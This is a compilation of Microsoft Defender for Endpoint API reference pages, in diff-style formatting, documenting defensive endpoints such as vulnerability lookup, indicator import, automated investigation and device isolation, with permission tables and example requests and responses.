-> Want to experience Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-exposedapis-abovefoldlink)
----
-## API description
-Retrieves a collection of devices related to a given user ID.
-
-## Limitations
-
-Rate limitations for this API are 100 calls per minute and 1500 calls per hour.
-
-## Permissions
-
-One of the following permissions is required to call this API. To learn more, including how to choose permissions, see [Use Microsoft Defender for Endpoint APIs](apis-intro.md)
-
-Permission type|Permission|Permission display name
-:|:|:
-Application |Machine.Read.All|'Read all machine profiles'
-Application |Machine.ReadWrite.All |'Read and write all machine information'
-Delegated (work or school account) | Machine.Read | 'Read machine information'
-Delegated (work or school account) | Machine.ReadWrite | 'Read and write machine information'
-
-> [!NOTE]
-> When obtaining a token using user credentials:
->
-> - The user needs to have at least the following role permission: 'View Data'. For more information, see [Create and manage roles](../user-roles.md)
-> - Response will include only devices that the user can access, based on device group settings. For more information, see [Create and manage device groups](../machine-groups.md).
->
-> Device group creation is supported in Defender for Endpoint Plan 1 and Plan 2.
-
-## HTTP request
-
-```http
-GET /api/users/{id}/machines
-```
-
-**The ID is not the full UPN, but only the user name. (for example, to retrieve machines for user1@contoso.com use /api/users/user1/machines)**
-
-## Request headers
-
-Name|Type|Description
-:|:|:
-Authorization | String | Bearer {token}. **Required**.
-
-## Request body
-
-Empty
-
-## Response
-
-If successful and user exists - 200 OK with list of [machine](machine.md) entities in the body. If user does not exist - 200 OK with an empty set.
-
-## Example
-
-### Request
-
-Here is an example of the request.
-
-```http
-GET https://api.securitycenter.microsoft.com/api/users/user1/machines
-```
security Get Vuln By Software https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/api/get-vuln-by-software.md
- Title: List vulnerabilities by software
-description: Retrieve a list of vulnerabilities in the installed software.
------- m365-security-- tier3-- must-keep--- Previously updated : 12/18/2020--
-# List vulnerabilities by software
--
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-> Want to experience Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-exposedapis-abovefoldlink)
----
-Retrieve a list of vulnerabilities in the installed software.
-
-## Permissions
-
-One of the following permissions is required to call this API. To learn more, including how to choose permissions, see [Use Microsoft Defender for Endpoint APIs](apis-intro.md) for details.
-
-Permission type|Permission|Permission display name
-:|:|:
-Application|Vulnerability.Read.All|'Read Threat and Vulnerability Management Software information'
-Delegated (work or school account)|Vulnerability.Read|'Read Threat and Vulnerability Management Software information'
-
-## HTTP request
-
-```http
-GET /api/Software/{Id}/vulnerabilities
-```
-
-## Request headers
-
-|Name|Type|Description
-||||
-|Authorization|String|Bearer {token}.**Required**.
-
-## Request body
-
-Empty
-
-## Response
-
-If successful, this method returns 200 OK with a list of vulnerabilities exposed by the specified software.
-
-## Example
-
-### Request example
-
-Here is an example of the request.
-
-```http
-GET https://api.securitycenter.microsoft.com/api/Software/microsoft-_-edge/vulnerabilities
-```
-
-### Response example
-
-Here is an example of the response.
-
-```json
-{
- "@odata.context": "https://api.securitycenter.microsoft.com/api/$metadata#Collection(Analytics.Contracts.PublicAPI.PublicVulnerabilityDto)",
- "value": [
- {
- "id": "CVE-2017-0140",
- "name": "CVE-2017-0140",
- "description": "A security feature bypass vulnerability exists when Microsoft Edge improperly handles requests of different origins. The vulnerability allows Microsoft Edge to bypass Same-Origin Policy (SOP) restrictions, and to allow requests that should otherwise be ignored. An attacker who successfully exploited the vulnerability could force the browser to send data that would otherwise be restricted.In a web-based attack scenario, an attacker could host a specially crafted website that is designed to exploit the vulnerability through Microsoft Edge and then convince a user to view the website. The attacker could also take advantage of compromised websites, and websites that accept or host user-provided content or advertisements. These websites could contain specially crafted content that could exploit the vulnerability.The security update addresses the vulnerability by modifying how affected Microsoft Edge handles different-origin requests.",
- "severity": "Medium",
- "cvssV3": 4.2,
- "exposedMachines": 1,
- "publishedOn": "2017-03-14T00:00:00Z",
- "updatedOn": "2019-10-03T00:03:00Z",
- "publicExploit": false,
- "exploitVerified": false,
- "exploitInKit": false,
- "exploitTypes": [],
- "exploitUris": []
- }
- ...
- ]
-}
-```
security Get Vulnerability By Id https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/api/get-vulnerability-by-id.md
- Title: Get vulnerability by ID
-description: Retrieves vulnerability information by its ID.
------- m365-security-- tier3-- must-keep--- Previously updated : 12/18/2020--
-# Get vulnerability by ID
--
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)--
-> Want to experience Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-exposedapis-abovefoldlink)
----
-Retrieves vulnerability information by its ID.
-
-## Permissions
-
-One of the following permissions is required to call this API. To learn more, including how to choose permissions, see [Use Microsoft Defender for Endpoint APIs](apis-intro.md) for details.
-
-Permission type|Permission|Permission display name
-:|:|:
-Application|Vulnerability.Read.All|'Read Threat and Vulnerability Management vulnerability information'
-Delegated (work or school account)|Vulnerability.Read|'Read Threat and Vulnerability Management vulnerability information'
-
-## HTTP request
-
-```http
-GET /api/vulnerabilities/{cveId}
-```
-
-## Request headers
-
-Name|Type|Description
-:|:|:
-Authorization|String|Bearer {token}. **Required**.
-
-## Request body
-
-Empty
-
-## Response
-
-If successful, this method returns 200 OK with the vulnerability information in the body.
-
-## Example
-
-### Request example
-
-Here is an example of the request.
-
-```http
-GET https://api.securitycenter.microsoft.com/api/Vulnerabilities/CVE-2019-0608
-```
-
-### Response example
-
-Here is an example of the response.
-
-```json
-{
- "@odata.context": "https://api.securitycenter.microsoft.com/api/$metadata#Vulnerabilities/$entity",
- "id": "CVE-2019-0608",
- "name": "CVE-2019-0608",
- "description": "A spoofing vulnerability exists when Microsoft Browsers does not properly parse HTTP content. An attacker who successfully exploited this vulnerability could impersonate a user request by crafting HTTP queries. The specially crafted website could either spoof content or serve as a pivot to chain an attack with other vulnerabilities in web services.To exploit the vulnerability, the user must click a specially crafted URL. In an email attack scenario, an attacker could send an email message containing the specially crafted URL to the user in an attempt to convince the user to click it.In a web-based attack scenario, an attacker could host a specially crafted website designed to appear as a legitimate website to the user. However, the attacker would have no way to force the user to visit the specially crafted website. The attacker would have to convince the user to visit the specially crafted website, typically by way of enticement in an email or instant message, and then convince the user to interact with content on the website.The update addresses the vulnerability by correcting how Microsoft Browsers parses HTTP responses.",
- "severity": "Medium",
- "cvssV3": 4.3,
- "exposedMachines": 4,
- "publishedOn": "2019-10-08T00:00:00Z",
- "updatedOn": "2019-12-16T16:20:00Z",
- "publicExploit": false,
- "exploitVerified": false,
- "exploitInKit": false,
- "exploitTypes": [],
- "exploitUris": []
-}
-```
-
-## Related topics
--- [Microsoft Defender Vulnerability Management](/microsoft-365/security/defender-endpoint/next-gen-threat-and-vuln-mgt)-- [Vulnerabilities in your organization](/microsoft-365/security/defender-endpoint/tvm-weaknesses)
security Import Ti Indicators https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/api/import-ti-indicators.md
- Title: Import Indicators API
-description: Learn how to use the Import batch of Indicator API in Microsoft Defender for Endpoint.
------- m365-security-- tier3-- must-keep--- Previously updated : 02/02/2021--
-# Import Indicators API
---
-**Applies to:**
-- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-
-> Want to experience Microsoft Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-exposedapis-abovefoldlink)
---
-## API description
-
-Submits or Updates batch of [Indicator](ti-indicator.md) entities.
-
-CIDR notation for IPs isn't supported.
-
-## Limitations
-
-1. Rate limitations for this API are 30 calls per minute.
-2. There's a limit of 15,000 active [Indicators](ti-indicator.md) per tenant.
-3. Maximum batch size for one API call is 500.
-
-## Permissions
-
-One of the following permissions is required to call this API. To learn more, including how to choose permissions, see [Get started](apis-intro.md).
-
-|Permission type|Permission|Permission display name|
-||||
-|Application|Ti.ReadWrite|`Read and write Indicators`|
-|Application|Ti.ReadWrite.All|`Read and write All Indicators`|
-|Delegated (work or school account)|Ti.ReadWrite|`Read and write Indicators`|
-
-## HTTP request
-
-```http
-POST https://api.securitycenter.microsoft.com/api/indicators/import
-```
-
-## Request headers
-
-| Name|Type|Description|
-||||
-|Authorization|String|Bearer {token}. **Required**.|
-|Content-Type|string|application/json. **Required**.|
-
-## Request body
-
-In the request body, supply a JSON object with the following parameters:
-
-|Parameter|Type|Description|
-||||
-|Indicators|List<[Indicator](ti-indicator.md)>|List of [Indicators](ti-indicator.md). **Required** |
-
-## Response
--- If successful, this method returns 200 - OK response code with a list of import results per indicator, see the following example.-- If not successful: this method return 400 - Bad Request. Bad request usually indicates incorrect body.-
-## Example
-
-### Request example
-
-Here's an example of the request.
-
-```http
-POST https://api.securitycenter.microsoft.com/api/indicators/import
-```
-
-```json
-{
- "Indicators":
- [
- {
- "indicatorValue": "220e7d15b011d7fac48f2bd61114db1022197f7f",
- "indicatorType": "FileSha1",
- "title": "demo",
- "application": "demo-test",
- "expirationTime": "2021-12-12T00:00:00Z",
- "action": "Alert",
- "severity": "Informational",
- "description": "demo2",
- "recommendedActions": "nothing",
- "rbacGroupNames": ["group1", "group2"]
- },
- {
- "indicatorValue": "2233223322332233223322332233223322332233223322332233223322332222",
- "indicatorType": "FileSha256",
- "title": "demo2",
- "application": "demo-test2",
- "expirationTime": "2021-12-12T00:00:00Z",
- "action": "Alert",
- "severity": "Medium",
- "description": "demo2",
- "recommendedActions": "nothing",
- "rbacGroupNames": []
- }
- ]
-}
-```
-
-### Response example
-
-Here's an example of the response.
-
-```json
-{
- "value": [
- {
- "id": "2841",
- "indicator": "220e7d15b011d7fac48f2bd61114db1022197f7f",
- "isFailed": false,
- "failureReason": null
- },
- {
- "id": "2842",
- "indicator": "2233223322332233223322332233223322332233223322332233223322332222",
- "isFailed": false,
- "failureReason": null
- }
- ]
-}
-```
-
-## Related article
--- [Manage indicators](../manage-indicators.md)
security Initiate Autoir Investigation https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/api/initiate-autoir-investigation.md
- Title: Start Investigation API
-description: Use this API to start investigation on a device.
------- m365-security-- tier3-- must-keep--- Previously updated : 12/18/2020--
-# Start Investigation API
--
-**Applies to:**
-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-> Want to experience Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-exposedapis-abovefoldlink)
---
-## API description
-
-Start automated investigation on a device.
-
-See [Overview of automated investigations](../automated-investigations.md) for more information.
-
-## Limitations
-
-1. Rate limitations for this API are 50 calls per hour.
-
-## Requirements for AIR
-
-Your organization must have Defender for Endpoint (see [Minimum requirements for Microsoft Defender for Endpoint](../minimum-requirements.md).
-
-Currently, AIR only supports the following OS versions:
--- Windows Server 2019-- Windows Server 2022-- Windows 10, version 1709 (OS Build 16299.1085 with [KB4493441](https://support.microsoft.com/help/4493441/windows-10-update-kb4493441)) or later-- Windows 10, version 1803 (OS Build 17134.704 with [KB4493464](https://support.microsoft.com/help/4493464/windows-10-update-kb4493464)) or later-- Windows 10, version [1803](/windows/release-information/status-windows-10-1809-and-windows-server-2019) or later-- Windows 11-
-## Permissions
-
-One of the following permissions is required to call this API. To learn more, including how to choose permissions, see [Use Microsoft Defender for Endpoint APIs](apis-intro.md)
-
-Permission type|Permission|Permission display name
-:|:|:
-Application|Alert.ReadWrite.All|'Read and write all alerts'
-Delegated (work or school account)|Alert.ReadWrite|'Read and write alerts'
-
-> [!NOTE]
-> When obtaining a token using user credentials:
->
-> - The user needs to have at least the following role permission: 'Active remediation actions' (See [Create and manage roles](../user-roles.md) for more information)
-> - The user needs to have access to the device, based on device group settings (See [Create and manage device groups](../machine-groups.md) for more information)
->
-> Device group creation is supported in Defender for Endpoint Plan 1 and Plan 2.
-
-## HTTP request
-
-```http
-POST https://api.security.microsoft.com/api/machines/{id}/startInvestigation
-```
-
-## Request headers
-
-Name|Type|Description
-:|:|:
-Authorization|String|Bearer {token}. **Required**.
-Content-Type|string|application/json. **Required**.
-
-## Request body
-
-In the request body, supply a JSON object with the following parameters:
-
-Parameter|Type|Description
-:|:|:
-Comment|String|Comment to associate with the action. **Required**.
-
-## Response
-
-If successful, this method returns 201 - Created response code and [Investigation](investigation.md) in the response body.
-
-## Example
-
-### Request
-
-Here is an example of the request.
-
-```https
-POST https://api.security.microsoft.com/api/machines/1e5bc9d7e413ddd7902c2932e418702b84d0cc07/startInvestigation
-```
-
-```json
-{
- "Comment": "Test investigation"
-}
-```
security Investigation https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/api/investigation.md
- Title: Investigation resource type
-description: Microsoft Defender for Endpoint Investigation entity.
------- m365-security-- tier3-- must-keep--- Previously updated : 12/18/2020--
-# Investigation resource type
--
-**Applies to:**
-- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-> Want to experience Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-exposedapis-abovefoldlink)
---
-Represent an Automated Investigation entity in Defender for Endpoint.
-
-For more information, see [Overview of automated investigations](../automated-investigations.md).
-
-## Methods
-
-Method|Return Type|Description
-:|:|:
-[List Investigations](get-investigation-collection.md)|Investigation collection|Get collection of Investigation
-[Get single Investigation](get-investigation-object.md)|Investigation entity|Gets single Investigation entity.
-[Start Investigation](initiate-autoir-investigation.md)|Investigation entity|Starts Investigation on a device.
-
-## Properties
-
-Property|Type|Description
-:|:|:
-ID|String|Identity of the investigation entity.
-startTime|DateTime Nullable|The date and time when the investigation was created.
-endTime|DateTime Nullable|The date and time when the investigation was completed.
-cancelledBy|String|The ID of the user/application that canceled that investigation.
-State|Enum|The current state of the investigation. Possible values are: 'Unknown', 'Terminated', 'SuccessfullyRemediated', 'Benign', 'Failed', 'PartiallyRemediated', 'Running', 'PendingApproval', 'PendingResource', 'PartiallyInvestigated', 'TerminatedByUser', 'TerminatedBySystem', 'Queued', 'InnerFailure', 'PreexistingAlert', 'UnsupportedOs', 'UnsupportedAlertType', 'SuppressedAlert'.
-statusDetails|String|Additional information about the state of the investigation.
-machineId|String|The ID of the device on which the investigation is executed.
-computerDnsName|String|The name of the device on which the investigation is executed.
-triggeringAlertId|String|The ID of the alert that triggered the investigation.
-
-## Json representation
-
-```json
-{
- "id": "63004",
- "startTime": "2020-01-06T13:05:15Z",
- "endTime": null,
- "state": "Running",
- "cancelledBy": null,
- "statusDetails": null,
- "machineId": "e828a0624ed33f919db541065190d2f75e50a071",
- "computerDnsName": "desktop-test123",
- "triggeringAlertId": "da637139127150012465_1011995739"
-}
-```
security Isolate Machine https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/api/isolate-machine.md
- Title: Isolate machine API
-description: Learn how to use the Isolate machine API to isolate a device from accessing external network in Microsoft Defender for Endpoint.
------- m365-security-- tier3-- must-keep--- Previously updated : 12/18/2020--
-# Isolate machine API
---
-**Applies to:**
-- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)--
-> Want to experience Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-exposedapis-abovefoldlink)
---
-## API description
-
-Isolates a device from accessing external network.
-
-## Limitations
-
-1. Rate limitations for this API are 100 calls per minute and 1500 calls per hour.
--
-> [!IMPORTANT]
->
-> - Full isolation is available for devices on Windows 10, version 1703, and on Windows 11.
-> - Full isolation is available in **public preview** for all supported Microsoft Defender for Endpoint on Linux listed in [System requirements](../microsoft-defender-endpoint-linux.md#system-requirements).
-> - Selective isolation is available for devices on Windows 10, version 1709 or later, and on Windows 11.
-> - When isolating a device, only certain processes and destinations are allowed. Therefore, devices that are behind a full VPN tunnel won't be able to reach the Microsoft Defender for Endpoint cloud service after the device is isolated. We recommend using a split-tunneling VPN for Microsoft Defender for Endpoint and Microsoft Defender Antivirus cloud-based protection-related traffic.
-
-## Permissions
-
-One of the following permissions is required to call this API. To learn more, including how to choose permissions, see [Use Microsoft Defender for Endpoint APIs](apis-intro.md)
-
-Permission type|Permission|Permission display name
-:|:|:
-Application|Machine.Isolate|'Isolate machine'
-Delegated (work or school account)|Machine.Isolate|'Isolate machine'
-
-> [!NOTE]
-> When obtaining a token using user credentials:
->
-> - The user needs to have at least the following role permission: 'Active remediation actions' (See [Create and manage roles](../user-roles.md) for more information)
-> - The user needs to have access to the device, based on device group settings (See [Create and manage device groups](../machine-groups.md) for more information)
->
-> Device group creation is supported in Defender for Endpoint Plan 1 and Plan 2.
-
-## HTTP request
-
-```http
-POST https://api.securitycenter.microsoft.com/api/machines/{id}/isolate
-```
-
-## Request headers
-
-Name|Type|Description
-:|:|:
-Authorization|String|Bearer {token}. **Required**.
-Content-Type|string|application/json. **Required**.
-
-## Request body
-
-In the request body, supply a JSON object with the following parameters:
-
-Parameter|Type|Description
-:|:|:
-Comment|String|Comment to associate with the action. **Required**.
-IsolationType|String|Type of the isolation. Allowed values are: 'Full' or 'Selective'.
-
-**IsolationType** controls the type of isolation to perform and can be one of the following:
--- Full: Full isolation-- Selective: Restrict only limited set of applications from accessing the network (see [Isolate devices from the network](../respond-machine-alerts.md#isolate-devices-from-the-network) for more details)-
-## Response
-
-If successful, this method returns 201 - Created response code and [Machine Action](machineaction.md) in the response body.
-
-## Example
-
-### Request
-
-Here is an example of the request.
-
-```http
-POST https://api.securitycenter.microsoft.com/api/machines/1e5bc9d7e413ddd7902c2932e418702b84d0cc07/isolate
-```
-
-```json
-{
- "Comment": "Isolate machine due to alert 1234",
- "IsolationType": "Full"
-}
-```
--- To release a device from isolation, see [Release device from isolation](unisolate-machine.md).
security List Library Files https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/api/list-library-files.md
- Title: List library files
-description: Learn how to list live response library files.
--- NOCSH------ m365-security-- tier3-- must-keep--- Previously updated : 04/17/2024--
-# List library files
--
-**Applies to:** [Microsoft Defender for Endpoint](https://go.microsoft.com/fwlink/?linkid=2154037)
---- Want to experience Microsoft Defender for Endpoint? [Sign up for a free trial.](https://www.microsoft.com/microsoft-365/windows/microsoft-defender-atp?ocid=docs-wdatp-exposedapis-abovefoldlink) ---
-## API description
-
-List live response library files.
-
-## Limitations
-
-1. Rate limitations for this API are 100 calls per minute and 1,500 calls per
- hour.
-
-## Permissions
-
-One of the following permissions is required to call this API. To learn more,
-including how to choose permissions, see [Get
-started](apis-intro.md).
-
-|Permission type | Permission | Permission display name |
-|--|--||
-| Application | Library.Manage | Manage live response library |
-| Delegated (work or school account) | Library.Manage | Manage live response library |
-
-## HTTP request
-
-```HTTP
-GET https://api.security.microsoft.com/api/libraryfiles
-```
-
-## Request headers
-
-| Name | Type | Description
-|--|--||
-| Authorization | String | Bearer {token}. Required. |
-
-## Request body
-Empty
-
-## Response
-If successful, this method returns 200 - OK response code with a collection
- of live response library file entities.
-
-## Example
-
-**Request**
-
-Here's an example of a request that gets all live response library files.
-
-```HTTP
-GET https://api.security.microsoft.com/api/libraryfiles
-```
-
-## Response example
-
-Here's an example of the response.
-
-```JSON
-HTTP/1.1 200 Ok
-Content-type: application/json
-{
-"\@odata.context": "https://api.security.microsoft.com
-/api/\$metadata\#LibraryFiles",
-"value": [
- {
- "fileName": "script1.ps1",
- "sha256": "6e212a0db618507c44e4ec8ee7499dfef7e5767e5f8d31144df3b96fd1145caf",
- "description": null,
- "creationTime": "2019-10-24T10:54:23.2009016Z",
- "lastUpdatedTime": "2019-10-24T10:54:23.2009016Z",
- "createdBy": "admin",
- "hasParameters": true,
- "parametersDescription": "test"
- },
- {
- "fileName": "script.sh",
- "sha256": "d0f3e3b0641dbf88ee39c822516e81a909d1d06d22341dd9b1f12aa5e5c027a2",
- "description": null,
- "creationTime": "2018-10-24T11:15:35.3688259Z",
- "lastUpdatedTime": "2018-10-24T11:15:35.3688259Z",
- "createdBy": "username",
- "hasParameters": false
- },
- {
- "fileName": "memdump.exe",
- "sha256": "fa70b87730290c0d30fe255d1dfb65de82f96286ebfeeb1d88ed3cc831329825",
- "description": "Process memory dump",
- "creationTime": "2018-10-24T10:54:23.2009016Z",
- "lastUpdatedTime": "2018-10-24T10:54:23.2009016Z",
- "createdBy": "admin",
- "hasParameters": false
- }
-]
-}
-```
--
-## Related article
-- [Run live response](run-live-response.md)
security List Recommendation Software https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/api/list-recommendation-software.md
- Title: List software by recommendation
-description: Retrieves a security recommendation related to a specific software.
------- m365-security-- tier3-- must-keep--- Previously updated : 08/11/2021--
-# List software by recommendation
--
-**Applies to:**
-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-
-> Want to experience Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-exposedapis-abovefoldlink)
-----
-Retrieves a security recommendation related to a specific software.
-
-## Permissions
-
-One of the following permissions is required to call this API. To learn more, including how to choose permissions, see [Use Microsoft Defender for Endpoint APIs](apis-intro.md) for details.
-
-Permission type|Permission|Permission display name
-:|:|:
-Application|Software.Read.All|'Read Threat and Vulnerability Management Software information'
-Delegated (work or school account)|SecurityRecommendation.Read|'Read Threat and Vulnerability Management security recommendation information'
-
-## HTTP request
-
-```http
-GET /api/recommendations/{id}/software
-```
-
-## Request headers
-
-Name|Type|Description
-:|:|:
-Authorization|String|Bearer {token}. **Required**.
-
-## Request body
-
-Empty
-
-## Response
-
-If successful, this method returns 200 OK with the software associated with the security recommendations in the body.
-
-## Example
-
-### Request example
-
-Here is an example of the request.
-
-```http
-GET https://api.securitycenter.microsoft.com/api/recommendations/va-_-google-_-chrome/software
-```
-
-### Response example
-
-Here is an example of the response.
-
-```json
-{
- "@odata.context": "https://api.securitycenter.microsoft.com/api/$metadata#Analytics.Contracts.PublicAPI.PublicProductDto",
- "id": "google-_-chrome",
- "name": "chrome",
- "vendor": "google",
- "weaknesses": 38,
- "publicExploit": false,
- "activeAlert": false,
- "exposedMachines": 5,
- "impactScore": 3.94418621
-}
-```
-
-## Related topics
--- [Microsoft Defender Vulnerability Management](/microsoft-365/security/defender-endpoint/next-gen-threat-and-vuln-mgt)-- [Defender Vulnerability Management security recommendation](/microsoft-365/security/defender-endpoint/tvm-security-recommendation)
security Machine https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/api/machine.md
- Title: Machine resource type
-description: Learn about the methods and properties of the Machine resource type in Microsoft Defender for Endpoint.
------- m365-security-- tier3-- must-keep--- Previously updated : 12/18/2020--
-# Machine resource type
--
-**Applies to:**
-- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-> Want to experience Microsoft Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-exposedapis-abovefoldlink)
----
-## Methods
-
-|Method|Return Type|Description|
-||||
-|[List machines](get-machines.md)|[machine](machine.md) collection|List set of [machine](machine.md) entities in the org.|
-|[Get machine](get-machine-by-id.md)|[machine](machine.md)|Get a [machine](machine.md) by its identity.|
-|[Get logged on users](get-machine-log-on-users.md)|[user](user.md) collection|Get the set of [User](user.md) that logged on to the [machine](machine.md).|
-|[Get related alerts](get-machine-related-alerts.md)|[alert](alerts.md) collection|Get the set of [alert](alerts.md) entities that were raised on the [machine](machine.md).|
-|[Get installed software](get-installed-software.md)|[software](software.md) collection|Retrieves a collection of installed software related to a given machine ID.|
-|[Get discovered vulnerabilities](get-discovered-vulnerabilities.md)|[vulnerability](vulnerability.md) collection|Retrieves a collection of discovered vulnerabilities related to a given machine ID.|
-|[Get security recommendations](get-security-recommendations.md)|[recommendation](recommendation.md) collection|Retrieves a collection of security recommendations related to a given machine ID.|
-|[Add or Remove machine tags](add-or-remove-machine-tags.md)|[machine](machine.md)|Add or Remove tag to a specific machine.|
-|[Find machines by IP](find-machines-by-ip.md)|[machine](machine.md) collection|Find machines seen with IP.|
-|[Find machines by tag](find-machines-by-tag.md)|[machine](machine.md) collection|Find machines by [Tag](../machine-tags.md).|
-|[Get missing KBs](get-missing-kbs-machine.md)|KB collection|Get a list of missing KBs associated with the machine ID|
-|[Set device value](set-device-value.md)|[machine](machine.md) collection|Set the [value of a device](../tvm-assign-device-value.md).|
-|[Update machine](update-machine-method.md)|[machine](machine.md) collection|Get the update status of a machine.|
-
-## Properties
-
-|Property|Type|Description|
-||||
-|id|String|[machine](machine.md) identity.|
-|computerDnsName|String|[machine](machine.md) fully qualified name.|
-|firstSeen|DateTimeOffset|First date and time where the [machine](machine.md) was observed by Microsoft Defender for Endpoint.|
-|lastSeen|DateTimeOffset|Time and date of the last received full device report. A device typically sends a full report every 24 hours. <br> NOTE: This property doesn't correspond to the last seen value in the UI. It pertains to the last device update.|
-|osPlatform|String|Operating system platform.|
-|onboardingstatus|String|Status of machine onboarding. Possible values are: `onboarded`, `CanBeOnboarded`, `Unsupported`, and `InsufficientInfo`.|
-|osProcessor|String|Operating system processor. Use osArchitecture property instead.|
-|version|String|Operating system Version.|
-|osBuild|Nullable long|Operating system build number.|
-|lastIpAddress|String|Last IP on local NIC on the [machine](machine.md).|
-|lastExternalIpAddress|String|Last IP through which the [machine](machine.md) accessed the internet.|
-|healthStatus|Enum|[machine](machine.md) health status. Possible values are: `Active`, `Inactive`, `ImpairedCommunication`, `NoSensorData`, `NoSensorDataImpairedCommunication`, and `Unknown`.|
-|rbacGroupName|String|Machine group Name.|
-|rbacGroupId|String|Machine group ID.|
-|riskScore|Nullable Enum|Risk score as evaluated by Microsoft Defender for Endpoint. Possible values are: `None`, `Informational`, `Low`, `Medium`, and `High`.|
-|aadDeviceId|Nullable representation Guid|Microsoft Entra Device ID (when [machine](machine.md) is Microsoft Entra joined).|
-|machineTags|String collection|Set of [machine](machine.md) tags.|
-|exposureLevel|Nullable Enum|Exposure level as evaluated by Microsoft Defender for Endpoint. Possible values are: `None`, `Low`, `Medium`, and `High`.|
-|deviceValue|Nullable Enum|The [value of the device](../tvm-assign-device-value.md). Possible values are: `Normal`, `Low`, and `High`.|
-|ipAddresses|IpAddress collection|Set of ***IpAddress*** objects. See [Get machines API](get-machines.md).|
-|osArchitecture|String|Operating system architecture. Possible values are: `32-bit`, `64-bit`. Use this property instead of osProcessor.|
-
security Machineaction https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/api/machineaction.md
- Title: machineAction resource type
-description: Learn about the methods and properties of the MachineAction resource type in Microsoft Defender for Endpoint.
------- m365-security-- tier3--- Previously updated : 12/18/2020--
-# MachineAction resource type
--
-**Applies to:**
-- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-> Want to experience Microsoft Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-exposedapis-abovefoldlink)
------- For more information, see [Response Actions](../respond-machine-alerts.md).-
